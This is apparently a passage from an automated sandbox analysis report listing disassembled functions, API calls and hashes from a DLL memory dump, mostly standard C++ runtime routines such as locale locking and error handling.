int.LIBCPMT ref: 6D48A319

Part of subcall function 6D46161C: std::_Lockit::_Lockit.LIBCPMT ref: 6D46162D
Part of subcall function 6D46161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6D461647

numpunct.LIBCPMT ref: 6D48A33C
std::_Facet_Register.LIBCPMT ref: 6D48A353
std::_Lockit::~_Lockit.LIBCPMT ref: 6D48A373
__CxxThrowException@8.LIBVCRUNTIME ref: 6D48A391

Memory Dump Source

Source File: 00000000.00000002.917299629.000000006D461000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: true

Associated: 00000000.00000002.917294141.000000006D460000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.917348475.000000006D4EA000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.925206892.000000006D545000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.927426246.000000006D55C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.928422377.000000006D55D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrownumpunct
String ID:
API String ID: 2509942033-0
Opcode ID: 5761a842eba435c2182e6ce2394eee20bf438fb82286629696cc5987ef5fa6df
Instruction ID: abced2d4da36ca310a4813956fb5df31c093eb062dd35b70daf8e60aa874baf9
Opcode Fuzzy Hash: 5761a842eba435c2182e6ce2394eee20bf438fb82286629696cc5987ef5fa6df
Instruction Fuzzy Hash: 5611E0758082299BCF00EBA4C841FEDB7B5AF90314F2A400CD611A7392DFB4EE0187E2

Uniqueness

Uniqueness Score: -1.00%

Function 6D4D621F, Relevance: 9.2, APIs: 6, Instructions: 216COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,6D4BF290,6D4BF290,?,?,?,6D4D6470,00000001,00000001,C5E85006), ref: 6D4D6279
MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,6D4D6470,00000001,00000001,C5E85006,?,?,?), ref: 6D4D62FF
WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,C5E85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 6D4D63F9
__freea.LIBCMT ref: 6D4D6406

Part of subcall function 6D4CF26D: RtlAllocateHeap.NTDLL(00000000,6D4875D9,00000000,?,6D4A0F8B,00000002,00000000,?,?,?,6D461298,6D4875D9,00000004,00000000,00000000,00000000), ref: 6D4CF29F

__freea.LIBCMT ref: 6D4D640F
__freea.LIBCMT ref: 6D4D6434

Memory Dump Source

Source File: 00000000.00000002.917299629.000000006D461000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: true

Associated: 00000000.00000002.917294141.000000006D460000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.917348475.000000006D4EA000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.925206892.000000006D545000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.927426246.000000006D55C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.928422377.000000006D55D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: ByteCharMultiWide__freea$AllocateHeap
String ID:
API String ID: 1414292761-0
Opcode ID: 4aaf365e87f75d08669a9a6becb0ce56ce29052cd6ad4069f15efe5d16428acc
Instruction ID: 3173b6be8ca60f6da65b741c7f917a018fba417df5609d4eacd24428755599cc
Opcode Fuzzy Hash: 4aaf365e87f75d08669a9a6becb0ce56ce29052cd6ad4069f15efe5d16428acc
Instruction Fuzzy Hash: 3B51F07261022AABEB158F64CCA0FBB77A9EF44750F26422DFD14E6285EB34DC5186D0

Uniqueness

Uniqueness Score: -1.00%

Function 6D4A42C8, Relevance: 9.1, APIs: 6, Instructions: 60COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00000001,?,6D4A3EDB,6D49FA25,6D49FD54,?,6D49FF71,?,00000001,?,?,00000001,?,6D5427E0,0000000C,6D4A006E), ref: 6D4A42D6
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 6D4A42E4
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 6D4A42FD
SetLastError.KERNEL32(00000000,6D49FF71,?,00000001,?,?,00000001,?,6D5427E0,0000000C,6D4A006E,?,00000001,?), ref: 6D4A434F

Memory Dump Source

Source File: 00000000.00000002.917299629.000000006D461000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: true

Associated: 00000000.00000002.917294141.000000006D460000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.917348475.000000006D4EA000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.925206892.000000006D545000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.927426246.000000006D55C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.928422377.000000006D55D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: 71e25ef1253ae4326d843aec082438d6feda889a0f958052d6a3b879616a7c9a
Instruction ID: 8bc95817a677a78d893d09f448f2f3839c5270ee65e09dea72099e92a8e78bff
Opcode Fuzzy Hash: 71e25ef1253ae4326d843aec082438d6feda889a0f958052d6a3b879616a7c9a
Instruction Fuzzy Hash: 3201F13620D3266EAA0466B46C85FBE3774EB273BA33A022EE61C855DCEF114C018284

Uniqueness

Uniqueness Score: -1.00%

Function 6D48F94B, Relevance: 9.1, APIs: 6, Instructions: 54COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6D48F952
std::_Lockit::_Lockit.LIBCPMT ref: 6D48F95C
int.LIBCPMT ref: 6D48F973

Part of subcall function 6D46161C: std::_Lockit::_Lockit.LIBCPMT ref: 6D46162D
Part of subcall function 6D46161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6D461647

std::_Facet_Register.LIBCPMT ref: 6D48F9AD
std::_Lockit::~_Lockit.LIBCPMT ref: 6D48F9CD
__CxxThrowException@8.LIBVCRUNTIME ref: 6D48F9EB

Memory Dump Source

Source File: 00000000.00000002.917299629.000000006D461000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: true

Associated: 00000000.00000002.917294141.000000006D460000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.917348475.000000006D4EA000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.925206892.000000006D545000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.927426246.000000006D55C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.928422377.000000006D55D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrow
String ID:
API String ID: 651022567-0
Opcode ID: 1de1452794336d9ecd64706f9208bfe92dcb09241b9dab73658e449ec1d9fd58
Instruction ID: 413d63261156e07c60e9a0c56b7c34ef882b037ff71d2c1a7543f1ac3963d020
Opcode Fuzzy Hash: 1de1452794336d9ecd64706f9208bfe92dcb09241b9dab73658e449ec1d9fd58
Instruction Fuzzy Hash: A011E0B5808169ABCF01EBA0C850EEDB775AF94314F2A400DD611BB392DB70DD018BE1

Uniqueness

Uniqueness Score: -1.00%

Function 6D49B93E, Relevance: 9.1, APIs: 6, Instructions: 54COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6D49B945
std::_Lockit::_Lockit.LIBCPMT ref: 6D49B94F
int.LIBCPMT ref: 6D49B966

Part of subcall function 6D46161C: std::_Lockit::_Lockit.LIBCPMT ref: 6D46162D
Part of subcall function 6D46161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6D461647

std::_Facet_Register.LIBCPMT ref: 6D49B9A0
std::_Lockit::~_Lockit.LIBCPMT ref: 6D49B9C0
__CxxThrowException@8.LIBVCRUNTIME ref: 6D49B9DE

Memory Dump Source

Source File: 00000000.00000002.917299629.000000006D461000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: true

Associated: 00000000.00000002.917294141.000000006D460000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.917348475.000000006D4EA000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.925206892.000000006D545000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.927426246.000000006D55C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.928422377.000000006D55D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrow
String ID:
API String ID: 651022567-0
Opcode ID: 2dadaa7b8b92e5aaa80ac16c4c4280a3d7722f3b0bccfc34945aa5ccbaab6729
Instruction ID: 3e65a5739e91fbbf53de77b968be8bc3a21afed7d5e1aef55939d2bab6454509
Opcode Fuzzy Hash: 2dadaa7b8b92e5aaa80ac16c4c4280a3d7722f3b0bccfc34945aa5ccbaab6729
Instruction Fuzzy Hash: 5D11A375818229DBCF05EBA4C850EEEBBB5AF54314F1A400DD611AB391DB749D01C7E1

Uniqueness

Uniqueness Score: -1.00%

Function 6D49B898, Relevance: 9.1, APIs: 6, Instructions: 54COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6D49B89F
std::_Lockit::_Lockit.LIBCPMT ref: 6D49B8A9
int.LIBCPMT ref: 6D49B8C0

Part of subcall function 6D46161C: std::_Lockit::_Lockit.LIBCPMT ref: 6D46162D
Part of subcall function 6D46161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6D461647

std::_Facet_Register.LIBCPMT ref: 6D49B8FA
std::_Lockit::~_Lockit.LIBCPMT ref: 6D49B91A
__CxxThrowException@8.LIBVCRUNTIME ref: 6D49B938

Memory Dump Source

Source File: 00000000.00000002.917299629.000000006D461000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: true

Associated: 00000000.00000002.917294141.000000006D460000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.917348475.000000006D4EA000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.925206892.000000006D545000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.927426246.000000006D55C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.928422377.000000006D55D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrow
String ID:
API String ID: 651022567-0
Opcode ID: cfbf9278a1ca9ca13abb159bbccb05642850adedca58161f3d9a7770883b46f8
Instruction ID: 472d440e90e5c5bfb0b0c7551b0eb9d94885c0afcfde7968bfb20ed78ac64360
Opcode Fuzzy Hash: cfbf9278a1ca9ca13abb159bbccb05642850adedca58161f3d9a7770883b46f8
Instruction Fuzzy Hash: C711E3758181599BCF00EBA0C840FEEBBB5AF95314F1A400CD611BB391CB749E0187D1

Uniqueness

Uniqueness Score: -1.00%

Function 6D48FB3D, Relevance: 9.1, APIs: 6, Instructions: 54COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6D48FB44
std::_Lockit::_Lockit.LIBCPMT ref: 6D48FB4E
int.LIBCPMT ref: 6D48FB65

Part of subcall function 6D46161C: std::_Lockit::_Lockit.LIBCPMT ref: 6D46162D
Part of subcall function 6D46161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6D461647

std::_Facet_Register.LIBCPMT ref: 6D48FB9F
std::_Lockit::~_Lockit.LIBCPMT ref: 6D48FBBF
__CxxThrowException@8.LIBVCRUNTIME ref: 6D48FBDD

Memory Dump Source

Source File: 00000000.00000002.917299629.000000006D461000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: true

Associated: 00000000.00000002.917294141.000000006D460000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.917348475.000000006D4EA000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.925206892.000000006D545000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.927426246.000000006D55C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.928422377.000000006D55D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrow
String ID:
API String ID: 651022567-0
Opcode ID: 3a2f8599625f501159c4651e144431b9a8b31ede5359f5da329e35a44bd1b449
Instruction ID: 2584654cb72cbbd84590999cae6866bd55ae825cd5f0c39a4658e4570ec58ae0
Opcode Fuzzy Hash: 3a2f8599625f501159c4651e144431b9a8b31ede5359f5da329e35a44bd1b449
Instruction Fuzzy Hash: 231102B680815A9BCF05EBA4C854FEDB774AF94314F2A440DD612BB392DB70DE008BE1

Uniqueness

Uniqueness Score: -1.00%

Function 6D48FBE3, Relevance: 9.1, APIs: 6, Instructions: 54COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6D48FBEA
std::_Lockit::_Lockit.LIBCPMT ref: 6D48FBF4
int.LIBCPMT ref: 6D48FC0B

Part of subcall function 6D46161C: std::_Lockit::_Lockit.LIBCPMT ref: 6D46162D
Part of subcall function 6D46161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6D461647

std::_Facet_Register.LIBCPMT ref: 6D48FC45
std::_Lockit::~_Lockit.LIBCPMT ref: 6D48FC65
__CxxThrowException@8.LIBVCRUNTIME ref: 6D48FC83

Memory Dump Source

Source File: 00000000.00000002.917299629.000000006D461000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: true

Associated: 00000000.00000002.917294141.000000006D460000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.917348475.000000006D4EA000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.925206892.000000006D545000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.927426246.000000006D55C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.928422377.000000006D55D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrow
String ID:
API String ID: 651022567-0
Opcode ID: 53520635b23175b7c4b452ac05ad3b8028138148d07f09d84d04940d71848beb
Instruction ID: 45f83649875276f5273acb5ab3468fcf003a3e0f775572dacf8ff23bbaeec4d9
Opcode Fuzzy Hash: 53520635b23175b7c4b452ac05ad3b8028138148d07f09d84d04940d71848beb
Instruction Fuzzy Hash: 5211A3758081659BCF05EBA4C844EEEB7B5BF94354F1A400CD611A7391DB75DE01CBE1

Uniqueness

Uniqueness Score: -1.00%

Function 6D48FA97, Relevance: 9.1, APIs: 6, Instructions: 54COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6D48FA9E
std::_Lockit::_Lockit.LIBCPMT ref: 6D48FAA8
int.LIBCPMT ref: 6D48FABF

Part of subcall function 6D46161C: std::_Lockit::_Lockit.LIBCPMT ref: 6D46162D
Part of subcall function 6D46161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6D461647

std::_Facet_Register.LIBCPMT ref: 6D48FAF9
std::_Lockit::~_Lockit.LIBCPMT ref: 6D48FB19
__CxxThrowException@8.LIBVCRUNTIME ref: 6D48FB37

Memory Dump Source

Source File: 00000000.00000002.917299629.000000006D461000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: true

Associated: 00000000.00000002.917294141.000000006D460000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.917348475.000000006D4EA000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.925206892.000000006D545000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.927426246.000000006D55C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.928422377.000000006D55D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrow
String ID:
API String ID: 651022567-0
Opcode ID: a7b2e2dd07edc8c1ed421e9cbdfb2963301d72bdced707641b6659575b757255
Instruction ID: 4d66c89b735543bb92a2e43d1bb85fa5b4f63798f2f84a4374aad38acb22a047
Opcode Fuzzy Hash: a7b2e2dd07edc8c1ed421e9cbdfb2963301d72bdced707641b6659575b757255
Instruction Fuzzy Hash: 6211E07690811A9BCF05EBA0C840EEEB775AF94354F2A400DD612BB395DB70DD01CBE1

Uniqueness

Uniqueness Score: -1.00%

Function 6D48F41B, Relevance: 9.1, APIs: 6, Instructions: 54COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6D48F422
std::_Lockit::_Lockit.LIBCPMT ref: 6D48F42C
int.LIBCPMT ref: 6D48F443

Part of subcall function 6D46161C: std::_Lockit::_Lockit.LIBCPMT ref: 6D46162D
Part of subcall function 6D46161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6D461647

std::_Facet_Register.LIBCPMT ref: 6D48F47D
std::_Lockit::~_Lockit.LIBCPMT ref: 6D48F49D
__CxxThrowException@8.LIBVCRUNTIME ref: 6D48F4BB

Memory Dump Source

Source File: 00000000.00000002.917299629.000000006D461000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: true

Associated: 00000000.00000002.917294141.000000006D460000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.917348475.000000006D4EA000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.925206892.000000006D545000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.927426246.000000006D55C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.928422377.000000006D55D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrow
String ID:
API String ID: 651022567-0
Opcode ID: cda2ce0c45d0d1204686d30966c80afe2cda17ba3bc6c5bd1d669d83f876b798
Instruction ID: b080cef5a886192b18f6a6d0357cba4e3640b3d37c6ffea784844c8184fb91c8
Opcode Fuzzy Hash: cda2ce0c45d0d1204686d30966c80afe2cda17ba3bc6c5bd1d669d83f876b798
Instruction Fuzzy Hash: 6811E3759082569BCF05EB60C850EEDB775AFA4714F1A400DD612BB395CB70DD0187D1

Uniqueness

Uniqueness Score: -1.00%

Function 6D484747, Relevance: 9.1, APIs: 6, Instructions: 54COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6D48474E
std::_Lockit::_Lockit.LIBCPMT ref: 6D484758
int.LIBCPMT ref: 6D48476F

Part of subcall function 6D46161C: std::_Lockit::_Lockit.LIBCPMT ref: 6D46162D
Part of subcall function 6D46161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6D461647

std::_Facet_Register.LIBCPMT ref: 6D4847A9
std::_Lockit::~_Lockit.LIBCPMT ref: 6D4847BF
__CxxThrowException@8.LIBVCRUNTIME ref: 6D4847DD

Memory Dump Source

Source File: 00000000.00000002.917299629.000000006D461000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: true

Associated: 00000000.00000002.917294141.000000006D460000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.917348475.000000006D4EA000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.925206892.000000006D545000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.927426246.000000006D55C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.928422377.000000006D55D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrow
String ID:
API String ID: 651022567-0
Opcode ID: 81c4663d8bb14e234e7bd39f5b0422c3765b75805e30a4f35d96b1dfab53c384
Instruction ID: a8e78c0b9f6d8db69a9497a2f437dd4e5169261919c51a67feb6d383ca776487
Opcode Fuzzy Hash: 81c4663d8bb14e234e7bd39f5b0422c3765b75805e30a4f35d96b1dfab53c384
Instruction Fuzzy Hash: 78110671C081258BCF06DBA4C840EEDB7B9AF59394F26450CE615BB291DB70DD0087D1

Uniqueness

Uniqueness Score: -1.00%

Function 6D48F7FF, Relevance: 9.1, APIs: 6, Instructions: 54COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6D48F806
std::_Lockit::_Lockit.LIBCPMT ref: 6D48F810
int.LIBCPMT ref: 6D48F827

Part of subcall function 6D46161C: std::_Lockit::_Lockit.LIBCPMT ref: 6D46162D
Part of subcall function 6D46161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6D461647

std::_Facet_Register.LIBCPMT ref: 6D48F861
std::_Lockit::~_Lockit.LIBCPMT ref: 6D48F881
__CxxThrowException@8.LIBVCRUNTIME ref: 6D48F89F

Memory Dump Source

Source File: 00000000.00000002.917299629.000000006D461000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: true

Associated: 00000000.00000002.917294141.000000006D460000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.917348475.000000006D4EA000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.925206892.000000006D545000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.927426246.000000006D55C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.928422377.000000006D55D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrow
String ID:
API String ID: 651022567-0
Opcode ID: 88baf692847629dac009a68b237dc511a2911be5f56cc8fa1920d166994d622d
Instruction ID: 810f1338df1e62c8d92567dd59dcb3acee500d2746aa7bb99502f819230f591e
Opcode Fuzzy Hash: 88baf692847629dac009a68b237dc511a2911be5f56cc8fa1920d166994d622d
Instruction Fuzzy Hash: FC11AC768086299BCF05EBA4C844FEDBB75AF94354F2A401CD611AB391DB74DE018BE2

Uniqueness

Uniqueness Score: -1.00%

Function 6D48A1A5, Relevance: 9.1, APIs: 6, Instructions: 54COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6D48A1AC
std::_Lockit::_Lockit.LIBCPMT ref: 6D48A1B6
int.LIBCPMT ref: 6D48A1CD

Part of subcall function 6D46161C: std::_Lockit::_Lockit.LIBCPMT ref: 6D46162D
Part of subcall function 6D46161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6D461647

std::_Facet_Register.LIBCPMT ref: 6D48A207
std::_Lockit::~_Lockit.LIBCPMT ref: 6D48A227
__CxxThrowException@8.LIBVCRUNTIME ref: 6D48A245

Memory Dump Source

Source File: 00000000.00000002.917299629.000000006D461000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: true

Associated: 00000000.00000002.917294141.000000006D460000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.917348475.000000006D4EA000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.925206892.000000006D545000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.927426246.000000006D55C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.928422377.000000006D55D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrow
String ID:
API String ID: 651022567-0
Opcode ID: 157f89e826c6ce93b8edbf6a23fbbcfbad65b5565dd51bd97184c100e906d634
Instruction ID: 7c7e697f728830f6e76bed9a50a12732e9de3e5a872ab48a7a2ba70eee9bef4e
Opcode Fuzzy Hash: 157f89e826c6ce93b8edbf6a23fbbcfbad65b5565dd51bd97184c100e906d634
Instruction Fuzzy Hash: 6311CE7580811A9BCF04EBA4C841EEDB7B4AF94318F2A400DD611A7392CFB5DE018BE2

Uniqueness

Uniqueness Score: -1.00%

Function 6D48A24B, Relevance: 9.1, APIs: 6, Instructions: 54COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6D48A252
std::_Lockit::_Lockit.LIBCPMT ref: 6D48A25C
int.LIBCPMT ref: 6D48A273

Part of subcall function 6D46161C: std::_Lockit::_Lockit.LIBCPMT ref: 6D46162D
Part of subcall function 6D46161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6D461647

std::_Facet_Register.LIBCPMT ref: 6D48A2AD
std::_Lockit::~_Lockit.LIBCPMT ref: 6D48A2CD
__CxxThrowException@8.LIBVCRUNTIME ref: 6D48A2EB

Memory Dump Source

Source File: 00000000.00000002.917299629.000000006D461000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: true

Associated: 00000000.00000002.917294141.000000006D460000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.917348475.000000006D4EA000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.925206892.000000006D545000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.927426246.000000006D55C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.928422377.000000006D55D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrow
String ID:
API String ID: 651022567-0
Opcode ID: 2d17a61d05bb58849a62b93c06df0b732d5b5d49bdf1894ed3b49293624192b7
Instruction ID: 25adec55a693d29c2407b1b7c9c126a34b206e1fa73fcabee832ec0d1734c6da
Opcode Fuzzy Hash: 2d17a61d05bb58849a62b93c06df0b732d5b5d49bdf1894ed3b49293624192b7
Instruction Fuzzy Hash: F411CE759082299BCF00EBA4C841EEDB775AFA4314F2A400CD612A7392DBB5ED01C7E2

Uniqueness

Uniqueness Score: -1.00%

Function 6D48F2CF, Relevance: 9.1, APIs: 6, Instructions: 54COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6D48F2D6
std::_Lockit::_Lockit.LIBCPMT ref: 6D48F2E0
int.LIBCPMT ref: 6D48F2F7

Part of subcall function 6D46161C: std::_Lockit::_Lockit.LIBCPMT ref: 6D46162D
Part of subcall function 6D46161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6D461647

std::_Facet_Register.LIBCPMT ref: 6D48F331
std::_Lockit::~_Lockit.LIBCPMT ref: 6D48F351
__CxxThrowException@8.LIBVCRUNTIME ref: 6D48F36F

Memory Dump Source

Source File: 00000000.00000002.917299629.000000006D461000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: true

Associated: 00000000.00000002.917294141.000000006D460000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.917348475.000000006D4EA000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.925206892.000000006D545000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.927426246.000000006D55C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.928422377.000000006D55D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrow
String ID:
API String ID: 651022567-0
Opcode ID: 4d16cf7d616b5c8aadcd97522df63b269be8a63005f818f5aa51c1256fff70a0
Instruction ID: adc5be253cd6340c1cefa14c96d1e177b0779ded549592bfacb6dcde162fed30
Opcode Fuzzy Hash: 4d16cf7d616b5c8aadcd97522df63b269be8a63005f818f5aa51c1256fff70a0
Instruction Fuzzy Hash: A311E0758082199BCF01EBA0C840FEDB775AFA4315F2A400DD622AB395DB70EE408BE1

Uniqueness

Uniqueness Score: -1.00%

Function 6D4846AB, Relevance: 9.1, APIs: 6, Instructions: 51COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6D4846B2
std::_Lockit::_Lockit.LIBCPMT ref: 6D4846BC
int.LIBCPMT ref: 6D4846D3

Part of subcall function 6D46161C: std::_Lockit::_Lockit.LIBCPMT ref: 6D46162D
Part of subcall function 6D46161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6D461647

std::_Facet_Register.LIBCPMT ref: 6D48470D
std::_Lockit::~_Lockit.LIBCPMT ref: 6D484723
__CxxThrowException@8.LIBVCRUNTIME ref: 6D484741

Memory Dump Source

Source File: 00000000.00000002.917299629.000000006D461000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: true

Associated: 00000000.00000002.917294141.000000006D460000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.917348475.000000006D4EA000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.925206892.000000006D545000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.927426246.000000006D55C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.928422377.000000006D55D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrow
String ID:
API String ID: 651022567-0
Opcode ID: ea45810abce178f2033dc8a327b6f005c1a76d7229755c275063784eaf2a641d
Instruction ID: ab849b927e5c8dde0457f247ba16e807a701ed3c22eeb1db519848436ca134f3
Opcode Fuzzy Hash: ea45810abce178f2033dc8a327b6f005c1a76d7229755c275063784eaf2a641d
Instruction Fuzzy Hash: 4811E571C081659BCF05DBA4C844EEDB775AF54395F2A010CE616B7291EB74DE00C7E1

Uniqueness

Uniqueness Score: -1.00%

Function 6D4CD5FF, Relevance: 9.0, APIs: 6, Instructions: 50COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(?,6D55CE94,6D4C1803,6D542B60,0000000C,6D48402A,00000000,00000001,?,`kTm,00000020,6D48159B,D7A19FD1), ref: 6D4CD603
_free.LIBCMT ref: 6D4CD636
_free.LIBCMT ref: 6D4CD65E
SetLastError.KERNEL32(00000000,6D542B60,0000000C,6D48402A,00000000,00000001,?,`kTm,00000020,6D48159B,D7A19FD1), ref: 6D4CD66B
SetLastError.KERNEL32(00000000,6D542B60,0000000C,6D48402A,00000000,00000001,?,`kTm,00000020,6D48159B,D7A19FD1), ref: 6D4CD677
_abort.LIBCMT ref: 6D4CD67D

Memory Dump Source

Source File: 00000000.00000002.917299629.000000006D461000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: true

Associated: 00000000.00000002.917294141.000000006D460000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.917348475.000000006D4EA000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.925206892.000000006D545000.00000004.00020000.sdmp Download File
